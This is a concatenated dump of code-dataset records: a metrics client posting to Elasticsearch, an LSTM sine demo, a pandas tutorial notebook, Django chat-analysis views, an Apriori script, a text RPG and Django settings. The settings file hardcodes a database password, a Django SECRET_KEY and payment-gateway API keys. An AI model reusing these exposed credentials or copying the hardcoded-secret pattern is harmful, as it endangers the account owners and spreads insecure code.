return_file_object=True)\n\n\n","sub_path":"franklyapi/image_processors/dimension.py","file_name":"dimension.py","file_ext":"py","file_size_in_byte":1872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"397528168","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport os\nimport sys\nimport yaml\nimport psutil\nimport pprint\nimport datetime\nimport platform\nimport warnings\nfrom elastic import elastic\n\npp = pprint.PrettyPrinter(indent=4)\nwarnings.filterwarnings(\"ignore\")\n\ndef get_kube_data(name):\n data = {}\n try:\n from kubernetes import client, config\n try: config.load_incluster_config()\n except: config.load_kube_config()\n version = client.VersionApi()\n v1 = client.CoreV1Api()\n except Exception as x:\n print(\"ERROR: Could not connect to kubernetes: {0}\".format(x))\n else:\n data.update({\"datetime\": datetime.datetime.utcnow()})\n data.update({\"k8s_name\": name})\n data.update({\"k8s_version\": version.get_code().git_version})\n\n nodes = v1.list_node().items\n cpu = 0; mem = 0 \n for node in nodes:\n try:\n cpu += int(node.status.capacity[\"cpu\"])\n mem += int(node.status.capacity[\"memory\"][:-2])\n except Exception:\n continue\n \n data.update({\"k8s_cpu\": cpu})\n data.update({\"k8s_memory\": round(int(mem/1024/1024),0)})\n data.update({\"k8s_nodes\": len(v1.list_node().items)})\n data.update({\"k8s_pods\": len(v1.list_pod_for_all_namespaces().items)})\n data.update({\"k8s_pvcs\": len(v1.list_persistent_volume_claim_for_all_namespaces().items)})\n #data.update({\"k8s_secrets\": len(v1.list_secret_for_all_namespaces().items)})\n 
data.update({\"k8s_services\": len(v1.list_service_for_all_namespaces().items)})\n\n return data\n\ndef get_docker_data():\n data = {}\n try:\n import docker\n client = docker.from_env()\n except Exception as x:\n print(\"ERROR: Could not connect to docker daemon: {0}\".format(x))\n else:\n data.update({\"dck_version\": client.version()[\"Components\"][0][\"Version\"]})\n data.update({\"dck_containers\": len(client.containers.list())})\n data.update({\"dck_images\": len(client.images.list())})\n\n return data\n\ndef get_system_data():\n print(\"INFO: getting system data\")\n data = {}\n data.update({\"server\": platform.uname()[1]})\n data.update({\"datetime\": datetime.datetime.utcnow()})\n data.update({\"os\": platform.uname()[2]})\n data.update({\"uptime\": datetime.datetime.fromtimestamp(psutil.boot_time())})\n data.update({\"cpu_prc\": round(psutil.cpu_percent(interval=1), 2)})\n data.update({\"mem_prc\": round(psutil.virtual_memory()[2], 2)})\n data.update({\"disc_prc\": round(psutil.disk_usage('/')[3], 2)})\n data.update({\"net_in\": psutil.net_io_counters()[1]})\n data.update({\"net_out\": psutil.net_io_counters()[0]})\n\n sensors = (\"bcm2835_thermal\", \"acpitz\", \"cpu-thermal\", \"radeon\")\n data.update({\"temp\": 0})\n for sensor in sensors:\n try: data.update({\"temp\": psutil.sensors_temperatures()[sensor][0][1]})\n except: continue\n else: break\n\n try:\n load = psutil.getloadavg()\n except Exception:\n load = (0, 0, 0)\n data.update({\"load1\": load[0]})\n data.update({\"load5\": load[1]})\n data.update({\"load15\": load[2]})\n\n # special case\n data.update({\"work\": \"wfica\" in (p.name() for p in psutil.process_iter())})\n\n return data\n\ndef read_config():\n directory = os.path.dirname(os.path.realpath(__file__))\n filename = \"config.yaml\"\n print(\"INFO: using config: %s/%s\" % (directory, filename))\n with open(r'%s/%s' % (directory, filename)) as file:\n documents = yaml.full_load(file)\n config = {}\n for item, doc in documents.items():\n config.update({item: doc})\n return config\n\ndef update_client():\n if datetime.datetime.utcnow().minute == 59:\n print(\"INFO: updating repo\")\n os.system(\"git pull\")\n\nif __name__ == '__main__':\n config = read_config()\n pp.pprint(config)\n\n # configure backend and send data\n try:\n url = config[\"elastic\"][\"url\"]\n username = config[\"elastic\"][\"user\"] \n password = config[\"elastic\"][\"pass\"]\n except Exception as x:\n print(\"ERROR: found no database credentials: {0}\".format(x))\n else:\n data = {}\n print(\"INFO: collecting data ...\")\n if config[\"monitor\"][\"system\"][\"enabled\"]:\n data.update(get_system_data())\n if config[\"monitor\"][\"system\"][\"updater\"]: update_client()\n if config[\"monitor\"][\"docker\"][\"enabled\"]:\n data.update(get_docker_data())\n if config[\"monitor\"][\"kube\"][\"enabled\"]:\n data.update(get_kube_data(config[\"monitor\"][\"kube\"][\"name\"]))\n\n print(\"INFO: sending data to elastic ...\")\n pp.pprint(data)\n\n if url and username and password:\n client = elastic(url, username, password)\n client.push_data(data)\n else:\n print(\"ERROR: credentials are missing values\")\n\n\n","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":4862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"120053246","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport numpy as np \nimport tensorflow as tf \nimport matplotlib as mpl \nfrom matplotlib import pyplot as plt \nfrom 
tensorflow.contrib.learn.python.learn.estimators.estimator import SKCompat \nimport numpy as np\nfrom pandas import read_csv\nfrom matplotlib import pyplot as plt\nimport math\nfrom keras.models import Sequential\nfrom keras.layers import Dense,LSTM\nfrom keras.layers.core import Dropout\nimport pandas as pd\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.metrics import mean_squared_error\n\n# TensorFlow的高层封装TFLearn \nlearn = tf.contrib.learn \nseed = 7\nbatch_size = 30\nepochs = 20\nfilename = '/home/kayky/project/POI motion data tracked with TPS model/Phantom-II.csv'\nfooter = 3\nlook_back=10\n# 神经网络参数 \nHIDDEN_SIZE = 30 # LSTM隐藏节点个数 \nNUM_LAYERS = 2 # LSTM层数 \nTIMESTEPS = 10 # 循环神经网络截断长度 \nBATCH_SIZE = 32 \n# batch大小 \n# 数据参数 \nTRAINING_STEPS = 3000 \n# 训练轮数 \nTRAINING_EXAMPLES = 10000\n # 训练数据个数 \nTESTING_EXAMPLES = 1000 \n# 测试数据个数 \nSAMPLE_GAP = 0.01 # 采样间隔 \ndef generate_data(seq): # 序列的第i项和后面的TIMESTEPS-1项合在一起作为输入,第i+TIMESTEPS项作为输出 \n X = [] \n y = [] \n for i in range(len(seq) - TIMESTEPS - 1): \n X.append([seq[i:i + TIMESTEPS]]) \n y.append([seq[i + TIMESTEPS]]) \n return np.array(X, dtype=np.float32), np.array(y, dtype=np.float32) \n \n# 用sin生成训练和测试数据集 \ntest_start = TRAINING_EXAMPLES * SAMPLE_GAP \ntest_end = (TRAINING_EXAMPLES + TESTING_EXAMPLES) * SAMPLE_GAP \ntrain_X, train_y = generate_data( \n np.sin(np.linspace(0, test_start, TRAINING_EXAMPLES, dtype=np.float32))) \nprint(train_X)\nprint(train_y)\ntest_X, test_y = generate_data( \n np.sin( np.linspace(test_start, test_end, TESTING_EXAMPLES, dtype=np.float32))) \nprint(test_X)\nprint(test_y)\ndef build_model():\n model = Sequential()\n model.add(LSTM(units=10, input_shape=(1, look_back)))\n model.add(Dense(units=1,activation='sigmoid'))\n model.compile(loss='mean_squared_error', optimizer='adam')\n return model\n\n\nif __name__ == '__main__':\n\n # 设置随机种子\n np.random.seed(seed)\n\n # 导入数据\n \n\n \n\n\n\n # 训练模型\n model = build_model()\n model.fit(train_X, train_y, epochs=epochs, batch_size=batch_size, verbose=2)\n print(model.summary())\n # 模型预测数据\n predict_train = model.predict(train_X)\n predict_validation = model.predict(test_X)\n print(predict_train)\n print(predict_validation)\n # 评估模型\n train_score = model.evaluate(train_X, train_y, verbose=0)\n print('Train Score: %.2f MSE (%.2f RMSE)' % (train_score, math.sqrt(train_score)))\n validation_score = model.evaluate(test_X, test_y, verbose=0)\n print('Validatin Score: %.2f MSE (%.2f RMSE)' % (validation_score, math.sqrt(validation_score)))\n\n\n \n","sub_path":"goodcode/sin.py","file_name":"sin.py","file_ext":"py","file_size_in_byte":2958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"576954906","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# \"Open\n\n# # Data Wrangling - La cirugía de los datos\n\n# In[1]:\n\n\nfrom google.colab import drive\ndrive.mount('/content/drive')\n\n\n# El **data wrangling**, a veces denominada **data munging**, es el proceso de transformar y mapear datos de un dataset *raw* (en bruto) en otro formato con la intención de hacerlo más apropiado y valioso para una variedad de propósitos posteriores, como el análisis. Un **data wrangler** es una persona que realiza estas operaciones de transformación.\n# \n# Esto puede incluir munging, visualización de datos, agregación de datos, entrenamiento de un modelo estadístico, así como muchos otros usos potenciales. 
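`generate_data` above turns a series into fixed-length input windows with the next value as the target. A compact version with a shape check; note the original's `range(len(seq) - TIMESTEPS - 1)` stops one window short of the end, while this sketch uses every available window:

```python
import numpy as np

def make_windows(seq, timesteps=10):
    """Turn a 1-D series into (samples, 1, timesteps) inputs and next-step targets."""
    X, y = [], []
    for i in range(len(seq) - timesteps):
        X.append([seq[i:i + timesteps]])   # window of the last `timesteps` values
        y.append([seq[i + timesteps]])     # the value immediately after it
    return np.array(X, dtype=np.float32), np.array(y, dtype=np.float32)

series = np.sin(np.linspace(0, 10, 200, dtype=np.float32))
X, y = make_windows(series)
assert X.shape == (190, 1, 10) and y.shape == (190, 1)
```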
La oscilación de datos como proceso generalmente sigue un conjunto de pasos generales que comienzan extrayendo los datos en forma cruda del origen de datos, dividiendo los datos en bruto usando algoritmos (por ejemplo, clasificación) o analizando los datos en estructuras de datos predefinidas, y finalmente depositando el contenido resultante en un sistema de almacenamiento (o silo) para su uso futuro.\n\n# In[ ]:\n\n\nimport pandas as pd\n\n\n# In[ ]:\n\n\ndata = pd.read_csv(\"/content/drive/My Drive/Curso Machine Learning con Python/datasets/customer-churn-model/Customer Churn Model.txt\")\n\n\n# In[5]:\n\n\ndata.head()\n\n\n# ### Crear un subconjunto de datos\n\n# #### Subconjunto de columna o columnas\n\n# In[ ]:\n\n\naccount_length = data[\"Account Length\"]\n\n\n# In[7]:\n\n\naccount_length.head()\n\n\n# In[8]:\n\n\ntype(account_length)\n\n\n# In[ ]:\n\n\nsubset = data[[\"Account Length\", \"Phone\", \"Eve Charge\", \"Day Calls\"]]\n\n\n# In[10]:\n\n\nsubset.head()\n\n\n# In[11]:\n\n\ntype(subset)\n\n\n# In[12]:\n\n\ndesired_columns = [\"Account Length\", \"Phone\", \"Eve Charge\", \"Night Calls\"]\nsubset = data[desired_columns]\nsubset.head()\n\n\n# In[13]:\n\n\ndesired_columns = [\"Account Length\", \"VMail Message\", \"Day Calls\"]\ndesired_columns\n\n\n# In[14]:\n\n\nall_columns_list = data.columns.values.tolist()\nall_columns_list\n\n\n# In[15]:\n\n\nsublist = [x for x in all_columns_list if x not in desired_columns]\nsublist\n\n\n# In[16]:\n\n\nsubset = data[sublist]\nsubset.head()\n\n\n# #### Subconjunto de filas\n\n# In[17]:\n\n\ndata[1:25]\n\n\n# In[18]:\n\n\ndata[10:35]\n\n\n# In[19]:\n\n\ndata[:8] # CORRECCIÓN: es lo mismo que data[0:8]\n\n\n# In[20]:\n\n\ndata[3320:]\n\n\n# #### Subconjuntos de filas con condiciones booleanas\n\n# In[21]:\n\n\n##Usuarios con Day Mins > 300\ndata1 = data[data[\"Day Mins\"]>300]\ndata1.shape\n\n\n# In[22]:\n\n\n##Usuarios de Nueva York (State = \"NY\")\ndata2 = data[data[\"State\"]==\"NY\"]\ndata2.shape\n\n\n# In[23]:\n\n\n##AND -> &\ndata3 = data[(data[\"Day Mins\"]>300) & (data[\"State\"]==\"NY\")]\ndata3.shape\n\n\n# In[24]:\n\n\n##OR -> |\ndata4 = data[(data[\"Day Mins\"]>300) | (data[\"State\"]==\"NY\")]\ndata4.shape\n\n\n# In[25]:\n\n\ndata5 = data[data[\"Day Calls\"] loc e iloc\n\n# In[ ]:\n\n\ndata.ix[1:10, 3:6] ## Primeras 10 filas, columnas de la 3 a la 6\n\n\n# In[29]:\n\n\ndata.iloc[1:10, 3:6]\n\n\n# In[30]:\n\n\ndata.iloc[:,3:6] ##Todas las filas para las columnas entre la 3 y la 6\ndata.iloc[1:10,:] ##Todas las columnas para las filas de la 1 a la 10\n\n\n# In[31]:\n\n\ndata.iloc[1:10, [2,5,7]]\n\n\n# In[32]:\n\n\ndata.iloc[[1,5,8,36], [2,5,7]]\n\n\n# In[33]:\n\n\ndata.loc[[1,5,8,36], [\"Area Code\", \"VMail Plan\", \"Day Mins\"]]\n\n\n# #### Insertar nuevas filas en el dataframe\n\n# In[ ]:\n\n\ndata[\"Total Mins\"] = data[\"Day Mins\"] + data[\"Night Mins\"] + data[\"Eve Mins\"]\n\n\n# In[35]:\n\n\ndata[\"Total Mins\"].head()\n\n\n# In[ ]:\n\n\ndata[\"Total Calls\"] = data[\"Day Calls\"] + data[\"Night Calls\"] + data[\"Eve Calls\"]\n\n\n# In[37]:\n\n\ndata[\"Total Calls\"].head()\n\n\n# In[38]:\n\n\ndata.shape\n\n\n# In[39]:\n\n\ndata.head()\n\n\n# ### Generación aleatoria de números\n\n# In[ ]:\n\n\nimport numpy as np\n\n\n# In[41]:\n\n\n##Generar un número aleatorio entero entre 1 y 100\nnp.random.randint(1,100)\n\n\n# In[42]:\n\n\n##La forma más clásica de generar un número aleatorio es entre 0 y 1 (con decimales)\nnp.random.random()\n\n\n# In[ ]:\n\n\n##Función que genera una lista de n números aleatorios enteros dentro 
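The subsetting recipes above still use `data.ix`, which was removed from pandas; `.loc` (labels) and `.iloc` (positions) cover both cases, and boolean masks need parentheses around each condition. A self-contained miniature of the same operations, on a made-up frame that echoes the churn columns:

```python
import pandas as pd

df = pd.DataFrame({
    'State': ['NY', 'OH', 'NY', 'KS'],
    'Day Mins': [310.4, 120.0, 305.9, 89.3],
    'Day Calls': [97, 80, 110, 64],
})

# Boolean masks combine with & (AND) and | (OR); each side needs parentheses.
busy_ny = df[(df['Day Mins'] > 300) & (df['State'] == 'NY')]

# .ix is gone; use .iloc for positions and .loc for labels.
by_position = df.iloc[0:2, 0:2]                     # first two rows and columns
by_label = df.loc[[0, 2], ['State', 'Day Calls']]   # explicit row/column labels

assert len(busy_ny) == 2
```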
del intervalo [a,b]\ndef randint_list(n, a, b):\n x = []\n for i in range(n):\n x.append(np.random.randint(a,b))\n return x\n\n\n# In[44]:\n\n\nrandint_list(25, 1, 50)\n\n\n# In[ ]:\n\n\nimport random\n\n\n# In[46]:\n\n\nfor i in range(10):\n print(random.randrange(0, 100,7))\n\n\n# #### Shuffling\n\n# In[47]:\n\n\na = np.arange(100)\na\n\n\n# In[ ]:\n\n\nnp.random.shuffle(a)\n\n\n# In[49]:\n\n\na\n\n\n# #### Choice\n\n# In[50]:\n\n\ndata.head()\n\n\n# In[51]:\n\n\ndata.shape\n\n\n# In[52]:\n\n\ncolumn_list = data.columns.values.tolist()\ncolumn_list\n\n\n# In[53]:\n\n\nnp.random.choice(column_list)\n\n\n# #### Seed\n\n# In[54]:\n\n\nnp.random.seed(2018)\nfor i in range(5):\n print(np.random.random())\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"Scripts_Ipynb2Py/T2 - 1 - Data Cleaning - Data Wrangling.py","file_name":"T2 - 1 - Data Cleaning - Data Wrangling.py","file_ext":"py","file_size_in_byte":5214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"314296405","text":"import os\nimport json\nfrom django.shortcuts import render, redirect\nfrom django.conf import settings\nfrom django.core.files.storage import FileSystemStorage\nfrom django.http import JsonResponse\nfrom django.db.models import Sum\n\nfrom .models import Chat\n\nfrom analytics.Conversation import Conversation\nfrom analytics.Analyzer import Analyzer\nfrom analytics.NpEncoder import NpEncoder\n\n\ndef place_value(number): \n return (\"{:,}\".format(number))\n\ndef get_msg_number():\n message_count = Chat.objects.aggregate(Sum('messages'))['messages__sum']\n if message_count:\n return place_value(message_count)\n return 0\n\ndef get_chat_number():\n chat_count = Chat.objects.all().count()\n if chat_count:\n return chat_count\n return 0\n\n# Create your views here.\ndef homepage(request):\n\n raw_chat_ranking = Chat.objects.exclude(name__isnull=True).exclude(name__exact='').order_by('messages').reverse()\n chat_ranking = []\n\n for chat in raw_chat_ranking:\n chat_ranking.append({'name': chat.name, 'messages': place_value(chat.messages)})\n \n return render(request, 'web/index.html', {'chat_count': get_chat_number(), 'message_count': get_msg_number(), 'chat_ranking':chat_ranking})\n\ndef analyze(request):\n if request.method == 'POST' and request.FILES['myfile']:\n chat_name = request.POST.get('chat-name')\n myfile = request.FILES['myfile']\n\n fs = FileSystemStorage(location=os.path.join(settings.BASE_DIR, 'media/raw'))\n filename = fs.save(myfile.name, myfile)\n \n conversation = Conversation(filename=filename)\n conversation_data = conversation.parse_data()\n\n analyzer = Analyzer(conversation_data, chat_name)\n data = analyzer.analyze()\n\n year_data = analyzer.year_analysis()\n\n json_data = json.dumps(data, cls=NpEncoder)\n year_data_json = json.dumps(year_data, cls=NpEncoder)\n\n if not chat_name:\n chat = Chat(messages=data['Total_Messages'])\n else:\n chat = Chat(messages=data['Total_Messages'], name=chat_name)\n\n \n \n chat.save()\n\n conversation.delete_files()\n\n\n return render(request, 'web/analyze.html', {\n 'json_data': json_data,\n 'year_data': year_data_json,\n 'year_count': year_data,\n 'chat_count': get_chat_number(),\n 'message_count': get_msg_number(),\n 'chat_name': chat_name\n })\n\n return render(request, 'web/analyze.html')\n","sub_path":"web/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"445333684","text":"# Apriori\n\n# 
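A note on a pattern in the Django views above: `Chat.objects.aggregate(Sum('messages'))['messages__sum']` returns `None` when the table is empty, so the count is guarded before formatting with thousands separators. The same guard in plain Python, with `total` standing in for the ORM result:

```python
def place_value(number):
    # "{:,}" inserts thousands separators: 1234567 -> '1,234,567'
    return "{:,}".format(number)

def message_count(total):
    """total mimics aggregate(Sum('messages'))['messages__sum'],
    which is None on an empty table."""
    return place_value(total) if total else 0

assert message_count(1234567) == '1,234,567'
assert message_count(None) == 0
```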
Importing the libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n# Data Preprocessing\ndataset = pd.read_csv('Market_Basket_Optimisation.csv', header = None)\ntransactions = []\nfor i in range(0, 7501):\n transactions.append([str(dataset.values[i,j]) for j in range(0, 20)])\n\n# Training Apriori on the dataset\nfrom apyori import apriori\nrules = apriori(transactions, min_support = 0.003, min_confidence = 0.2, min_lift = 3, min_length = 2)\n\n# Visualising the results\nresults = list(rules)\n\ndef display_top_products(results, n_products=5):\n print(\"Support\\tConf.\\tLift\\tProducts\")\n for result in results[:n_products]:\n support = round(100 * result.support, 2)\n confidence = round(result.ordered_statistics[0].confidence, 2)\n lift = round(result.ordered_statistics[0].lift, 2)\n products = \" + \".join(list(result.items))\n print(\"{0}%\\t{1}\\t{2}\\t{3}\".format(support, confidence, lift, products))\ndisplay_top_products(results, 20)","sub_path":"apriori.py","file_name":"apriori.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"5898870","text":"from enemy_units import *\nfrom witcher_unit import *\nfrom game import *\n\n\n\n\ndef welcome():\n print('Вас приветствует текстовая RPG - Ведьмак')\n\n\ndef get_initial_values():\n witcher_level = 0\n enemy_level = 0\n enemy_amount = 0\n while witcher_level == 0:\n try:\n witcher_level = int(input('Введите уровень ведьмака: '))\n enemy_level = int(input('Введите уровень противников: '))\n enemy_amount = int(input('Введите количество противников: '))\n return witcher_level, enemy_level, enemy_amount\n except Exception:\n print('не введено требуемое значение')\n\n\ndef get_env_and_start(witcher_level, enemy_level, enemy_amount):\n witcher = Witcher(witcher_level)\n type_enemy = random.randint(0, 2)\n enemies = []\n if type_enemy == 0:\n for el in range(0, enemy_amount):\n drowner = Drowner(enemy_level)\n enemies.append(drowner)\n\n elif type_enemy == 1:\n for el in range(0, enemy_amount):\n bandit = Bandit(enemy_level)\n enemies.append(bandit)\n else:\n for el in range(0, enemy_amount):\n ghost = Ghost(enemy_level)\n enemies.append(ghost)\n\n beginning_game = Game(witcher, enemies)\n\n print(beginning_game.fight())\n print('Лог боя: ')\n for el in beginning_game.history:\n print(' ' + el)\n print(beginning_game.find_turn_log('Ход 0'))\n\n\nwelcome()\nwitcher_level, enemy_level, enemy_amount = get_initial_values()\nget_env_and_start(witcher_level, enemy_level, enemy_amount)","sub_path":"main_start.py","file_name":"main_start.py","file_ext":"py","file_size_in_byte":1693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"268719825","text":"# Django settings for albatross_api project.\nimport os\n\nROOT_PATH = os.path.dirname(os.path.abspath(__file__))\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\n\nADMINS = (\n ('Dani Roxberry', 'droxberry@proace.com'),\n)\n\nMANAGERS = ADMINS\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.\n 'NAME': 'albatross', # Or path to database file if using sqlite3.\n 'USER': 'albatross', # Not used with sqlite3.\n 'PASSWORD': 'lufyr8_Qk3', # Not used with sqlite3.\n 'HOST': '', # Set to empty string for localhost. Not used with sqlite3.\n 'PORT': '', # Set to empty string for default. 
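The `apriori` call above filters rules by three statistics: support, confidence, and lift. Their definitions, computed by hand on a toy basket set using nothing beyond the standard library:

```python
transactions = [
    {'milk', 'bread'}, {'milk', 'eggs'}, {'bread', 'eggs'},
    {'milk', 'bread', 'eggs'}, {'bread'},
]
n = len(transactions)

def support(items):
    # fraction of baskets containing every item in `items`
    return sum(items <= t for t in transactions) / n

# For the rule milk -> bread:
sup = support({'milk', 'bread'})    # P(milk and bread)        = 0.40
conf = sup / support({'milk'})      # P(bread | milk)          ~ 0.67
lift = conf / support({'bread'})    # confidence vs. baseline  ~ 0.83

print(f"support={sup:.2f} confidence={conf:.2f} lift={lift:.2f}")
```

A lift above 1 (the threshold `min_lift = 3` used above is far stricter) means the antecedent genuinely raises the chance of the consequent rather than riding on its overall popularity.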
Not used with sqlite3.\n }\n}\n\n# Custom User Profile Module\nAUTH_PROFILE_MODULE = 'albatross_api.api.UserProfile'\n\n# Local time zone for this installation. Choices can be found here:\n# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name\n# although not all choices may be available on all operating systems.\n# In a Windows environment this must be set to your system time zone.\nTIME_ZONE = 'America/Chicago'\n\n# Language code for this installation. All choices can be found here:\n# http://www.i18nguy.com/unicode/language-identifiers.html\nLANGUAGE_CODE = 'en-us'\n\nSITE_ID = 1\n\n# If you set this to False, Django will make some optimizations so as not\n# to load the internationalization machinery.\nUSE_I18N = True\n\n# If you set this to False, Django will not format dates, numbers and\n# calendars according to the current locale.\nUSE_L10N = True\n\n# If you set this to False, Django will not use timezone-aware datetimes.\nUSE_TZ = True\n\n# Absolute filesystem path to the directory that will hold user-uploaded files.\n# Example: \"/home/media/media.lawrence.com/media/\"\nMEDIA_ROOT = os.path.join(ROOT_PATH, 'media')\n\n# URL that handles the media served from MEDIA_ROOT. Make sure to use a\n# trailing slash.\n# Examples: \"http://media.lawrence.com/media/\", \"http://example.com/media/\"\nMEDIA_URL = '/media/'\n\n# Absolute path to the directory static files should be collected to.\n# Don't put anything in this directory yourself; store your static files\n# in apps' \"static/\" subdirectories and in STATICFILES_DIRS.\n# Example: \"/home/media/media.lawrence.com/static/\"\nSTATIC_ROOT = os.path.join(ROOT_PATH, 'static')\n\n# URL prefix for static files.\n# Example: \"http://media.lawrence.com/static/\"\nSTATIC_URL = '/static/'\n\n# Additional locations of static files\nSTATICFILES_DIRS = (\n # Put strings here, like \"/home/html/static\" or \"C:/www/django/static\".\n # Always use forward slashes, even on Windows.\n # Don't forget to use absolute paths, not relative paths.\n)\n\n# List of finder classes that know how to find static files in\n# various locations.\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n# 'django.contrib.staticfiles.finders.DefaultStorageFinder',\n)\n\n# Make this unique, and don't share it with anybody.\nSECRET_KEY = 'x0we*7*jnf&cpa8op3&j0bvi2#(b45zix0jbv8vcti0l1%9!n&'\n\n# List of callables that know how to import templates from various sources.\nTEMPLATE_LOADERS = (\n 'django.template.loaders.filesystem.Loader',\n 'django.template.loaders.app_directories.Loader',\n# 'django.template.loaders.eggs.Loader',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n # Uncomment the next line for simple clickjacking protection:\n # 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\nROOT_URLCONF = 'albatross_api.urls'\n\nAUTHENTICATION_BACKENDS = (\n 'emailusernames.backends.EmailAuthBackend',\n)\n\n# Python dotted path to the WSGI application used by Django's runserver.\nWSGI_APPLICATION = 'albatross_api.wsgi.application'\n\nTEMPLATE_DIRS = (\n # Put strings here, like \"/home/html/django_templates\" or \"C:/www/django/templates\".\n # Always use forward slashes, even on Windows.\n # Don't forget to use absolute 
paths, not relative paths.\n os.path.join(ROOT_PATH, 'templates'),\n)\n\nINSTALLED_APPS = (\n 'grappelli', # django-grappelli\n 'annoying', # django-annoying\n\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n\n 'django.contrib.admin',\n 'django.contrib.admindocs',\n \n 'cloudinary',\n 'dj_database_url',\n 'south',\n 'djangorestframework',\n 'gunicorn',\n 'emailusernames',\n\n 'albatross_api.api',\n 'albatross_api.courses',\n 'albatross_api.deals',\n 'albatross_api.payments',\n)\n\n# Authorize.NET Payments\nAUTHORIZE_NET_API_TEST_LOGIN_ID = '6jL8p6YLga'\nAUTHORIZE_NET_API_TEST_TRANSACTION_KEY = '683yXy3FNv75kT59'\nAUTHORIZE_NET_API_LOGIN_ID = '7462PazjGf'\nAUTHORIZE_NET_API_TRANSACTION_KEY = '4p6Hs4hTYZ87647B'\n\n# GeoNames Reverse Geocoding for Zip Codes\nZIP_CODE_REVERSE_URL = 'http://api.geonames.org/postalCodeLookupJSON?formatted=true&country=US&username=albatrossgolfapp&style=full&postalcode=';\n\n# A sample logging configuration. The only tangible logging\n# performed by this configuration is to send an email to\n# the site admins on every HTTP 500 error when DEBUG=False.\n# See http://docs.djangoproject.com/en/dev/topics/logging for\n# more details on how to customize your logging configuration.\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'filters': {\n 'require_debug_false': {\n '()': 'django.utils.log.RequireDebugFalse'\n }\n },\n 'handlers': {\n 'mail_admins': {\n 'level': 'ERROR',\n 'filters': ['require_debug_false'],\n 'class': 'django.utils.log.AdminEmailHandler'\n }\n },\n 'loggers': {\n 'django.request': {\n 'handlers': ['mail_admins'],\n 'level': 'ERROR',\n 'propagate': True,\n },\n }\n}\n\n# SendGrid Config\nEMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'\nEMAIL_HOST = 'smtp.sendgrid.net'\nEMAIL_HOST_USER = os.environ['SENDGRID_USERNAME']\nEMAIL_HOST_PASSWORD = os.environ['SENDGRID_PASSWORD']\nEMAIL_PORT = 587\nEMAIL_USE_TLS = True\n\n# dj-database-url requirement for Heroku.\nimport dj_database_url\nDATABASES = {'default': dj_database_url.config(default='postgres://albatross:lufyr8_Qk3@localhost:5432/albatross')}\n\n# Import Heroku Settings\ntry:\n IS_HEROKU = os.environ['IS_HEROKU']\n if IS_HEROKU == 1:\n from heroku_settings import *\nexcept ImportError:\n pass","sub_path":"django/Albatross-Technologies/albatross-technologies/albatross_api/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":6942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"332627149","text":"##############################################################################\n#\n# Copyright (c) 2001, 2002 Zope Foundation and Contributors.\n# All Rights Reserved.\n#\n# This software is subject to the provisions of the Zope Public License,\n# Version 2.1 (ZPL). 
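`dj_database_url` collapses the whole connection into one URL. A rough illustration of the mapping it performs on a postgres URL, done here with `urllib.parse` and a placeholder password — this is not the library's actual implementation:

```python
from urllib.parse import urlparse

def parse_database_url(url):
    """Sketch of the URL -> Django DATABASES mapping dj_database_url performs."""
    parts = urlparse(url)
    return {
        'ENGINE': 'django.db.backends.postgresql_psycopg2',
        'NAME': parts.path.lstrip('/'),
        'USER': parts.username,
        'PASSWORD': parts.password,
        'HOST': parts.hostname or '',
        'PORT': str(parts.port or ''),
    }

cfg = parse_database_url('postgres://albatross:secret@localhost:5432/albatross')
assert cfg['NAME'] == 'albatross' and cfg['PORT'] == '5432'
```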
